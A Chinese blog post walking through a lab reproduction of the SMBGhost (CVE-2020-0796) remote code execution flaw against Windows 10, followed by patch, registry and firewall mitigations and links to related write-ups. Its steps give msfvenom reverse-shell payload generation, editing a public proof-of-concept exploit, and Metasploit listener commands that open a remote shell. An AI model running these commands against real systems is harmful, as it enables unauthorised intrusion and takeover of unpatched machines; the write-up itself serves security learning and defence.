CVE-2020-0796 “永恒之黑”

最新推荐文章于 2023-06-30 13:15:09 发布
最新推荐文章于 2023-06-30 13:15:09 发布
阅读量467 收藏 1
点赞数
分类专栏: 漏洞专栏 文章标签: windows 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Trouble_99/article/details/108411395
版权

前言:前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。

漏洞概述: 攻击者可以精心构造数据包发送到SMB服务器,无需经过身份验证,即可在目标服务器上执行任意代码。攻击者可通过部署一台恶意SMB v3服务器,并诱导用户(客户端)连接到该服务器,一旦目标用户连接,即可在计算机上执行攻击者自定义的恶意代码。

影响版本:
• Windows 10 Version 1903 for 32-bit Systems
• Windows 10 Version 1903 for ARM64-based Systems
• Windows 10 Version 1903 for x64-based Systems
• Windows 10 Version 1909 for 32-bit Systems
• Windows 10 Version 1909 for ARM64-based Systems
• Windows 10 Version 1909 for x64-based Systems
• Windows Server, version 1903 (Server Core installation)
• Windows Server, version 1909 (Server Core installation)

==================================================

靶场环境:windows 10 Version 1903 、 kali
win10 ip:192.168.0.102
kali ip: 192.168.0.107
工具: MSF 、 SMBGhost_RCE_PoC

==================================================

1.利用 meterpreter模块,生成二进制的Shellcode
思路:本漏洞是远程代码执行,执行payload 使用meterpreter模块

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.107 lport=1111 -b "\x00" -f python
// 这里的主机是kali本机端口,端口随意设置, -b 是以二进制输入 -f 选择格式

在这里插入图片描述

==================================================

2.复制二进制内容到 exploit.py中

将下载好的 SMBGhost_RCE_PoC 攻击工具复制到kali中,解压后文件。

复制生成出来的二进制编码,把原来exploit.py的字节码替代掉。

cp exploit.py exploit2.py  //进入到下载的工具目录,将文件复制一份
mosepad exploit2.py   //用记事本的方式打开文档

删除红色的二进制代码,留下最后一行。
USER_PAYLOAD += “\xa7\x94\x82\xa1”

在这里插入图片描述
修改最后一行的变量等于buf保存退出
USER_PAYLOAD = buf

在这里插入图片描述

==================================================

3.msf 开启监听

sudo msfconsole
use exploit/multi/handler   //进入监听模块
set payload windows/x64/meterpreter/reverse_tcp  //配置payload
set LHOST 192.168.0.107	 //kali ip 必须和之前生成二进制code的ip一样
set LPORT 1111			//端口一致
exploit

在这里插入图片描述

==================================================

4.启动exploit.py脚本

python3 exploit2.py -ip 192.168.0.102   //该ip是win10 ip

//成功获取目标shell

在这里插入图片描述

==================================================

注意细节:

  1. 目标是win10,内存尽量给大一点(4-8G),为了稳定
  2. 在正式攻击之前,重启一下win10系统
  3. 重启后稍等20秒,等待系统服务加载完毕

漏洞防御:

1.补丁更新:KB4551762

在这里插入图片描述
2.禁用SMBv3压缩

方法一:使用以下PowerShell命令禁用压缩功能,以阻止未经身份验证的攻击者利用SMBv3 服务器的漏洞。

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

用户可通过以下PowerShell命令撤销禁用压缩功能

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 0 -Force

3.设置防火墙策略

在边界防火墙做好安全策略阻止SMB通信流出企业内部,详情可参考微软官方的指南:

https://support.microsoft.com/zh-cn/help/3185535/preventing-smb-traffic-from-lateral-connections

pikeboom
关注
专栏目录
【漏洞复习】永恒
syhsa的博客
04-18 1541
总的来说,“永恒”漏洞揭示了网络安全中的一个重要问题,即即使是由政府部门开发的漏洞工具,一旦泄露,也可能被客和恶意分子利用,对网络安全构成严重威胁。“永恒”漏洞利用了微软Windows操作系统中的漏洞,主要是针对 SMB(Server Message Block)协议的漏洞。通过利用这些漏洞,攻击者可以远程执行代码,而无需用户交互,从而控制受感染的计算机。微软在意识到漏洞的严重性后,发布了紧急补丁来修复这些漏洞,建议用户尽快更新其Windows操作系统,以防止受到攻击的风险。
cve-2020-0796
y@n1n的博客
03-05 229
一.漏洞概述 1.漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受客攻击的目标系统只需开机在线即可能被入侵。 2.影响范围  适用于32位系统的Windows 10版本1903  Windows 10 1903版(用于基于x64的系统)  Windows 10 1903版(用于基于ARM64的系统)  Windows Server 1903版(服务器核
CVE-2020-0796
m_de_g的博客
10-08 6738
CVE-2020-0796(永恒) 一.对应出现的版本 永恒的对象为采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。 原理为由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 首先下载 CVE-2020
cve-2020-0796_CVE20200796(下)
weixin_39921087的博客
11-30 113
动态调试在我们运行POC之前,首先使用windbg对srv2!Srv2DecompressData函数下好断点,时候运行系统,运行POC。程序段下来之后在srvnet!SmbCompressionDecompress函数处下个断点,运行。通过上一篇文章的静态分析我们知道了srvnet!SmbCompressionDecompress的参数如下所示:1.压缩算法ecx1导致最后调用nt!R...
永恒CVE-2020-0796
m0_57379855的博客
04-01 5302
永恒CVE-2020-0796CVE-2020-0796 永恒漏洞 CVE-2020-0796 永恒漏洞 永恒漏洞与“永恒之蓝”漏洞极为相似,都是利用Windows SMB漏洞远程攻击获取系统最高权限。 漏洞危害等级:高危 “永恒”漏洞高危之处在于对SMB客户端的攻击,攻击者可以通过构造一个“特制”的网页、压缩包、共享目录、OFFICE文档等,向攻击目标发送,一旦被攻击者打开则瞬间触发漏洞受到攻击。 漏洞成因: CVE-2020-0796 漏洞存在于受影响版本的 Windows 驱动
CVE-2020-0796 检测及利用工具
qq_45300786的博客
10-26 319
https://www.cnblogs.com/xiaozi/p/13062533.html
83-83.渗透测试-CVE-2020-0796 永恒漏洞.mp4
05-10
83-83.渗透测试-CVE-2020-0796 永恒漏洞.mp4
CVE-2020-0796 POC 永恒 POC SMBGhost POC
10-15
CVE-2020-0796 POC 利用SMBv3远程代码执行漏洞 POC 永恒 POC SMBGhost POC 建议用户及时使用POC自查,如存在漏洞及时进行安全加固
CVE-2020-0796(永恒)漏洞复现
m0_73263892的博客
06-30 659
靶机:win 10攻击机:kalipython脚本:链接:https://pan.baidu.com/s/1GgInswJJC2RkSGdJk1_V5g?pwd=kt4r提取码:kt4r。
永恒CVE-2020-0796)漏洞复现
weixin_46463776的博客
04-15 891
永恒漏洞复现
CVE-2020-0796-POC.py
03-19
微软SMBv3远程代码执行漏洞(SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码)可被攻击者利用,实现无须权限即可执行远程代码,受攻击的目标系统只需开机在线即可能被入侵。该漏洞后果十分接近永恒之蓝系列,存在被WannaCry等勒索蠕虫利用的可能,攻击者可以构造特定的网页、压缩包、共享目录、Offic文档等多种方式触发漏洞进行攻击,对存在该漏洞的Windows主机造成严重威胁。
CVE-2020-0796.py
01-04
CVE-2020-0796的漏洞poc,遵守pocsuite3标准
CVE-2020-0796 POC EXP.zip
04-01
CVE-2020-0796的poc检测代码。 CVE-2020-0796本地exp执行代码。
永恒CVE-2020-0796 微软SMBv3协议远程代码执行漏洞)
曹振国的博客
07-26 2112
文章目录一、漏洞简介:二、影响版本:三、实验环境:四、漏洞复现1.下载CVE-2020-0796漏洞扫描工具,对网段进行扫描2.蓝屏复现3.远程执行复现 一、漏洞简介: 3月12日,微软更新安全通告针对Windows SMBv3客户端/服务器远程代码执行漏洞紧急发布了安全补丁,确定该漏洞编号为CVE-2020-0796。 Microsoft Server Message Block 3.1.1(SMBv3)协议在处理某些请求的方式中存在代码执行漏洞。攻击者可以精心构造数据包发送到SMB服务器,无需经过身份
CVE-2020-0796 SMB 远程代码执行漏洞分析、验证及加固
m0_47635965的博客
05-13 314
0x01漏洞描述 CVE-2020-0796是存在于微软服务器SMB协议中的一个“蠕虫化”漏洞,该漏洞未包含 在微软本月发布的补丁中,是在补丁的序言中泄露的。目前微软尚未发布任何技术详情,思科Talos团队和Fortinet公司提供了简短概述,目前尚不清楚该漏洞的补丁何时发布。Fortinet公司指出,该漏洞是“微软 SMB 服务器中的一个缓冲区溢出漏洞”,严重等级为最高评分,“该漏洞由易受攻击的软件错误地处理恶意构造的压缩数据包而触发。远程、未经认证的攻击者可利用该漏洞在该应用程序的上下文中执行任意代码。
CVE-2020-0796 RCE复现
子曰小玖的博客
07-10 413
0x01 简介 SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。 0x02 漏洞概述 **(CVE-2020-0796 SMBGhost)**该漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的,它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。 0
windows10 永恒复现(CVE-2020-0796
qq_53579360的博客
11-13 1552
永恒复现
CVE 2020-0796微软SMBv3快速检测与修复
qq_45434762的博客
03-16 1027
简介SMB(Server Message Block),是一个协议名,他能被用于Web链接和客户端与服务器之间的信息沟通。CVE 2020-0796漏洞是由于SMBv3协议在处理恶意的...
SMBv3远程代码执行漏洞复现(CVE-2020-0796)
谢公子的博客
06-05 2077
靶机:192.168.10.1 Kali攻击机:192.168.10.13 msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
CVE-2020-0796补丁
最新发布
07-03
CVE-2020-0796是一个安全漏洞的标识符,通常由Common Vulnerabilities and Exposures(公共漏洞及暴露)项目维护。这个特定的漏洞可能涉及到不同的软件产品或服务,但一般来说,它是对某个软件系统的一个严重弱点,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值